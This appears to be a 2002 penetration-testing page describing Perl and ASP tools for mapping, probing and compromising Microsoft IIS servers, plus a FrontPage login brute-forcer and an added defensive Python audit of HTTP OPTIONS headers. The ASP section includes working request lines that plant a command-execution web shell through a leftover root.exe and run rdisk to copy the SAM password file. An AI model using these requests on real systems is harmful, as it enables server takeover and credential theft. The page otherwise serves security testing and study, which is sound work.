Penetration Testing and Exploitation Tools for Microsoft IIS

by JoMo-kun 02/15/02


Testing Web Structure Permissions
Compromising Systems Using ASP
Brute Forcing FrontPage


Testing Web Structure Permissions

Mapping Web Site

GetDirsBDIR.pl

This script may be useful if Whisker reports the following security risk:

+ 200 OK: GET /scripts/iisadmin/bdir.htr

Performing a GET on the bdir.htr file, which is present on default installs of IIS 4.0, returns a single-level directory listing of the C:\ drive. The GetDirsBDIR.pl script uses this behaviour to build a recursive map of the directory structure under any drive and folder that the user specifies.

Example Usage: ./GetDirsBDIR.pl 192.168.0.1 d: inetpub\\wwwroot output.txt
Example Output:
Starting Directory Traversal...

inetpub
inetpub\iissamples
inetpub\iissamples\exair
inetpub\iissamples\exair\howitworks
inetpub\iissamples\sdk
inetpub\iissamples\sdk\asp
inetpub\iissamples\sdk\asp\docs


Finished Directory Traversal

GetDirsCMD.pl

This version of the script uses an existing copy of CMD.EXE on the server to map the directory structure. For example, Code Red may have left a copy of CMD.EXE at /msadc/root.exe, or the unicoder Perl script may have created one at /scripts/uni.exe.

Example Usage: ./GetDirsCMD.pl 192.168.0.1 /scripts/root.exe c: inetpub\\wwwroot output.txt

GetDirsASP.pl

This is yet another version of the original GetDirsBDIR.pl script. It makes use of the dir_list.asp code discussed below, which displays directory listings. To use this script, the tester must first be able to upload that ASP file.

Example Usage: ./GetDirsBDIR.pl 192.168.0.1 d: inetpub\\wwwroot output.txt

Checking Web Directory Permissions

** Note that the output from the directory mapping scripts above may need to be modified slightly before being used with these scripts. For example, blank lines may need to be removed and '\' replaced with '/'. **

GetOptions.pl

The GetOptions.pl script reads in a listing of directories relative to the web root and issues an HTTP OPTIONS request for each.

PutDirs.pl

The PutDirs.pl script reads in a listing of directories relative to the web root and attempts an HTTP PUT to each. The file it attempts to create is called "foo.txt" and contains the text "TEST". The script logs the status of each attempt to the output file.

PutDirs-DELETE.pl

The PutDirs-DELETE.pl script is a clean-up script for the previous PutDirs.pl script. It reads a list of directories and attempts an HTTP DELETE of the "foo.txt" file in each.

ChkDirEXE.pl

The ChkDirEXE.pl script takes as arguments the name of an executable script/program, a file containing directories relative to the web root, and an output file name. It first attempts to HTTP PUT the executable into a web directory. If this succeeds, it then calls the executable and determines whether the web server actually attempted to run the code. Finally, the script issues an HTTP DELETE for the file. The script works through all directories listed in the input file and logs every attempt to the output file.
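The following is an added example, not one of the scripts described on this page. It shows the defender's side of the GetOptions.pl check: take the plain-text output of the mapping scripts, normalize it into web-relative paths (blank lines dropped, backslashes replaced with slashes, as the note above calls for), issue an HTTP OPTIONS request per directory against your own server, and flag any directory whose Allow header advertises write or move methods. Only the Allow header is read; nothing is written to the server. The host name, directory list and the sample Allow header are constructed for the demonstration.

```python
"""Self-audit of HTTP methods advertised per web directory (added example)."""
import http.client

# Methods a static content directory should not advertise to anonymous users.
RISKY_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}


def normalize_paths(mapping_output):
    """Convert mapping-script output (one directory per line, backslash
    separated, relative to the web root) into URL paths with a trailing
    slash.  Blank lines and the Starting/Finished banner lines are dropped."""
    paths = []
    for line in mapping_output.splitlines():
        line = line.strip()
        if not line or line.startswith(("Starting", "Finished")):
            continue
        rel = line.replace("\\", "/").strip("/")
        path = "/" + rel + "/" if rel else "/"
        if path not in paths:
            paths.append(path)
    return paths


def parse_allow(header_value):
    """Parse an Allow header value into a set of upper-case method names."""
    if not header_value:
        return set()
    return {m.strip().upper() for m in header_value.split(",") if m.strip()}


def risky(allowed):
    """Sorted list of the advertised methods that permit writes or moves."""
    return sorted(allowed & RISKY_METHODS)


def options_allow(host, path, port=80, timeout=10):
    """Send one OPTIONS request; return (status code, Allow header or None)."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("OPTIONS", path)
        resp = conn.getresponse()
        return resp.status, resp.getheader("Allow")
    finally:
        conn.close()


def audit(host, mapping_output, port=80):
    """Map each directory to (status, risky methods) for reporting."""
    report = {}
    for path in normalize_paths(mapping_output):
        status, allow = options_allow(host, path, port)
        report[path] = (status, risky(parse_allow(allow)))
    return report


if __name__ == "__main__":
    import sys
    # Offline demonstration on a constructed Allow header; pass a host and a
    # mapping file on the command line to audit your own server.
    sample_allow = "OPTIONS, TRACE, GET, HEAD, POST, PUT, DELETE"
    print("constructed header ->", risky(parse_allow(sample_allow)))
    if len(sys.argv) == 3:
        with open(sys.argv[2]) as fh:
            for path, (status, bad) in audit(sys.argv[1], fh.read()).items():
                print(status, path, "REVIEW " + " ".join(bad) if bad else "ok")
```

Physical directories outside the web root (such as the iissamples tree in the mapping output above) are only reachable through whichever virtual directory IIS maps them to, so that translation remains a manual step before feeding the list in, exactly as the note above says.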

Compromising Systems Using ASP

Once you've found a directory which allows PUT, try these...

getpath.asp

The getpath.asp ASP file discloses the actual (physical) path that corresponds to whatever relative path is coded into it.

copier.asp

The copier.asp ASP file copies any file on the system (to which the IUSR account has access) to any location on the system. The script uses absolute paths, not relative ones.

dir_list.asp

The dir_list.asp file lists the contents of its own folder when called. The user can also specify which directory should be listed via the DIR parameter.

Example:
Request --> GET /dir_list.asp?DIR=C:\inetpub
Response -->

Contents of C:\Inetpub

File Name     File Size (bytes)   Date Created            File Type
Mailroot                      0   11/14/00 11:30:32 AM    File Folder
wwwroot                 2698135   11/14/00 11:31:06 AM    File Folder
iissamples               436551   11/14/00 11:31:27 AM    File Folder
Mail                     658140   11/14/00 11:36:41 AM    File Folder
scripts                  556293   11/14/00 11:39:06 AM    File Folder
ftproot                       0   11/14/00 11:39:26 AM    File Folder
Catalog.wci            11055765   11/14/00 11:39:42 AM    File Folder

callexe.asp

The callexe.asp ASP file is a powerful tool for rooting an IIS web server. It allows the user to specify an executable or system command in the CMD parameter of the GET request.

Example: GET /callexe.asp?CMD=dir c:\
Example: GET /callexe.asp?CMD=evil.bat

This tool exposes a serious security risk in IIS in that the WScript.Shell object executes as SYSTEM. See the following article: http://support.microsoft.com/default.aspx?scid=kb;EN-US;q278319. With this ASP file, running "rdisk /s-" and copying over a sam._ is trivial. Enjoy...

FYI: If there is already a copy of CMD.EXE on the web server, it can be used to create a simple ASP file which exploits this. See the example below for how to accomplish this with "echo". You won't see anything other than "" displayed, but IIS should be working its magic behind the scenes.

Example:

GET /root.exe?/c echo "<% Set WShShell = Server.CreateObject("WScript.Shell") RetCode = WShShell.Run("C:\winnt\system32\rdisk.exe /s-", 1, True) %>" > evil.asp
GET /evil.asp

Brute Forcing FrontPage

**UPDATE** A new, better tool has been released.


fp-checker.tar.gz

The fp-checker.pl script is a tool for brute forcing logins to an IIS server running FrontPage. It reads in either a list of username/password combinations or a list of passwords to try for a single username. It makes use of the included NTLM proxy to make repeated connection attempts to the FrontPage author.dll file and report if the attempt was successful. FYI: This script has not been heavily tested. It appears to work.